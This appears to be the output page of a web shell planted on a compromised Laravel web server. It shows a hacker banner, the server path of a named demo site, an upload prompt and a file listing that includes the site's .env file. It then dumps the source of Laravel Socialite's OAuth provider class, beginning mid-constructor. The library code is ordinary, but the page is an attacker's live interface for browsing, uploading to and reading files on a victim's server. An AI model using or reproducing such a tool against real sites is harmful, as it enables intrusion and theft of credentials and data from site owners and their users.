I am a hacker in the dark of a very cold night

path :/var/www/html/vorne.webheaydemo.com

upload file:

List of files:

name file	size	edit	permission
.editorconfig	276 KB	March 05 2024 07:12:34	0666
.env	1385 KB	May 24 2024 16:43:55	0666
.env.example	1088 KB	March 05 2024 07:12:34	0666
.gitattributes	190 KB	March 05 2024 07:12:34	0666
.gitignore	245 KB	March 05 2024 07:12:34	0666
.htaccess	947 KB	July 04 2023 21:25:08	0664
.rnd	1024 KB	March 13 2024 04:51:14	0666
README.md	472 KB	March 22 2024 10:35:00	0666
app	-	March 05 2024 07:12:34	0777
artisan	1739 KB	March 05 2024 07:12:34	0666
bootstrap	-	March 05 2024 07:12:34	0777
composer.json	2829 KB	May 13 2024 12:10:04	0666
composer.lock	417205 KB	March 19 2024 12:13:14	0666
config	-	July 03 2025 02:53:36	0777
database	-	March 05 2024 07:12:34	0777
index.php	1816 KB	May 13 2024 10:32:36	0666
lang	-	May 13 2024 14:53:26	0777
manifest.json	913 KB	May 14 2024 03:57:26	0664
package.json	398 KB	March 05 2024 07:12:34	0666
phpunit.xml	1206 KB	March 05 2024 07:12:34	0666
public	-	July 03 2025 02:37:20	0777
resources	-	May 13 2024 12:09:36	0777
routes	-	March 05 2024 07:12:34	0777
service-worker.js	924 KB	March 05 2024 07:12:34	0666
storage	-	March 05 2024 10:03:52	0777
symlink.php	218 KB	March 05 2024 07:12:34	0666
tests	-	March 05 2024 07:12:34	0777
vendor	-	March 19 2024 12:13:14	0777
vite.config.js	326 KB	March 05 2024 07:12:34	0666

guzzle = $guzzle; $this->request = $request; $this->clientId = $clientId; $this->redirectUrl = $redirectUrl; $this->clientSecret = $clientSecret; } /** * Get the authentication URL for the provider. * * @param string $state * @return string */ abstract protected function getAuthUrl($state); /** * Get the token URL for the provider. * * @return string */ abstract protected function getTokenUrl(); /** * Get the raw user for the given access token. * * @param string $token * @return array */ abstract protected function getUserByToken($token); /** * Map the raw user array to a Socialite User instance. * * @param array $user * @return \Laravel\Socialite\Two\User */ abstract protected function mapUserToObject(array $user); /** * Redirect the user of the application to the provider's authentication screen. * * @return \Illuminate\Http\RedirectResponse */ public function redirect() { $state = null; if ($this->usesState()) { $this->request->session()->put('state', $state = $this->getState()); } if ($this->usesPKCE()) { $this->request->session()->put('code_verifier', $this->getCodeVerifier()); } return new RedirectResponse($this->getAuthUrl($state)); } /** * Build the authentication URL for the provider from the given base URL. * * @param string $url * @param string $state * @return string */ protected function buildAuthUrlFromBase($url, $state) { return $url.'?'.http_build_query($this->getCodeFields($state), '', '&', $this->encodingType); } /** * Get the GET parameters for the code request. * * @param string|null $state * @return array */ protected function getCodeFields($state = null) { $fields = [ 'client_id' => $this->clientId, 'redirect_uri' => $this->redirectUrl, 'scope' => $this->formatScopes($this->getScopes(), $this->scopeSeparator), 'response_type' => 'code', ]; if ($this->usesState()) { $fields['state'] = $state; } if ($this->usesPKCE()) { $fields['code_challenge'] = $this->getCodeChallenge(); $fields['code_challenge_method'] = $this->getCodeChallengeMethod(); } return array_merge($fields, $this->parameters); } /** * Format the given scopes. * * @param array $scopes * @param string $scopeSeparator * @return string */ protected function formatScopes(array $scopes, $scopeSeparator) { return implode($scopeSeparator, $scopes); } /** * {@inheritdoc} */ public function user() { if ($this->user) { return $this->user; } if ($this->hasInvalidState()) { throw new InvalidStateException; } $response = $this->getAccessTokenResponse($this->getCode()); $user = $this->getUserByToken(Arr::get($response, 'access_token')); return $this->userInstance($response, $user); } /** * Create a user instance from the given data. * * @param array $response * @param array $user * @return \Laravel\Socialite\Two\User */ protected function userInstance(array $response, array $user) { $this->user = $this->mapUserToObject($user); return $this->user->setToken(Arr::get($response, 'access_token')) ->setRefreshToken(Arr::get($response, 'refresh_token')) ->setExpiresIn(Arr::get($response, 'expires_in')) ->setApprovedScopes(explode($this->scopeSeparator, Arr::get($response, 'scope', ''))); } /** * Get a Social User instance from a known access token. * * @param string $token * @return \Laravel\Socialite\Two\User */ public function userFromToken($token) { $user = $this->mapUserToObject($this->getUserByToken($token)); return $user->setToken($token); } /** * Determine if the current request / session has a mismatching "state". * * @return bool */ protected function hasInvalidState() { if ($this->isStateless()) { return false; } $state = $this->request->session()->pull('state'); return empty($state) || $this->request->input('state') !== $state; } /** * Get the access token response for the given code. * * @param string $code * @return array */ public function getAccessTokenResponse($code) { $response = $this->getHttpClient()->post($this->getTokenUrl(), [ RequestOptions::HEADERS => $this->getTokenHeaders($code), RequestOptions::FORM_PARAMS => $this->getTokenFields($code), ]); return json_decode($response->getBody(), true); } /** * Get the headers for the access token request. * * @param string $code * @return array */ protected function getTokenHeaders($code) { return ['Accept' => 'application/json']; } /** * Get the POST fields for the token request. * * @param string $code * @return array */ protected function getTokenFields($code) { $fields = [ 'grant_type' => 'authorization_code', 'client_id' => $this->clientId, 'client_secret' => $this->clientSecret, 'code' => $code, 'redirect_uri' => $this->redirectUrl, ]; if ($this->usesPKCE()) { $fields['code_verifier'] = $this->request->session()->pull('code_verifier'); } return $fields; } /** * Refresh a user's access token with a refresh token. * * @param string $refreshToken * @return \Laravel\Socialite\Two\Token */ public function refreshToken($refreshToken) { $response = $this->getRefreshTokenResponse($refreshToken); return new Token( Arr::get($response, 'access_token'), Arr::get($response, 'refresh_token'), Arr::get($response, 'expires_in'), explode($this->scopeSeparator, Arr::get($response, 'scope', '')) ); } /** * Get the refresh token response for the given refresh token. * * @param string $refreshToken * @return array */ protected function getRefreshTokenResponse($refreshToken) { return json_decode($this->getHttpClient()->post($this->getTokenUrl(), [ RequestOptions::HEADERS => ['Accept' => 'application/json'], RequestOptions::FORM_PARAMS => [ 'grant_type' => 'refresh_token', 'refresh_token' => $refreshToken, 'client_id' => $this->clientId, 'client_secret' => $this->clientSecret, ], ])->getBody(), true); } /** * Get the code from the request. * * @return string */ protected function getCode() { return $this->request->input('code'); } /** * Merge the scopes of the requested access. * * @param array|string $scopes * @return $this */ public function scopes($scopes) { $this->scopes = array_unique(array_merge($this->scopes, (array) $scopes)); return $this; } /** * Set the scopes of the requested access. * * @param array|string $scopes * @return $this */ public function setScopes($scopes) { $this->scopes = array_unique((array) $scopes); return $this; } /** * Get the current scopes. * * @return array */ public function getScopes() { return $this->scopes; } /** * Set the redirect URL. * * @param string $url * @return $this */ public function redirectUrl($url) { $this->redirectUrl = $url; return $this; } /** * Get a instance of the Guzzle HTTP client. * * @return \GuzzleHttp\Client */ protected function getHttpClient() { if (is_null($this->httpClient)) { $this->httpClient = new Client($this->guzzle); } return $this->httpClient; } /** * Set the Guzzle HTTP client instance. * * @param \GuzzleHttp\Client $client * @return $this */ public function setHttpClient(Client $client) { $this->httpClient = $client; return $this; } /** * Set the request instance. * * @param \Illuminate\Http\Request $request * @return $this */ public function setRequest(Request $request) { $this->request = $request; return $this; } /** * Determine if the provider is operating with state. * * @return bool */ protected function usesState() { return ! $this->stateless; } /** * Determine if the provider is operating as stateless. * * @return bool */ protected function isStateless() { return $this->stateless; } /** * Indicates that the provider should operate as stateless. * * @return $this */ public function stateless() { $this->stateless = true; return $this; } /** * Get the string used for session state. * * @return string */ protected function getState() { return Str::random(40); } /** * Determine if the provider uses PKCE. * * @return bool */ protected function usesPKCE() { return $this->usesPKCE; } /** * Enables PKCE for the provider. * * @return $this */ public function enablePKCE() { $this->usesPKCE = true; return $this; } /** * Generates a random string of the right length for the PKCE code verifier. * * @return string */ protected function getCodeVerifier() { return Str::random(96); } /** * Generates the PKCE code challenge based on the PKCE code verifier in the session. * * @return string */ protected function getCodeChallenge() { $hashed = hash('sha256', $this->request->session()->get('code_verifier'), true); return rtrim(strtr(base64_encode($hashed), '+/', '-_'), '='); } /** * Returns the hash method used to calculate the PKCE code challenge. * * @return string */ protected function getCodeChallengeMethod() { return 'S256'; } /** * Set the custom parameters of the request. * * @param array $parameters * @return $this */ public function with(array $parameters) { $this->parameters = $parameters; return $this; } }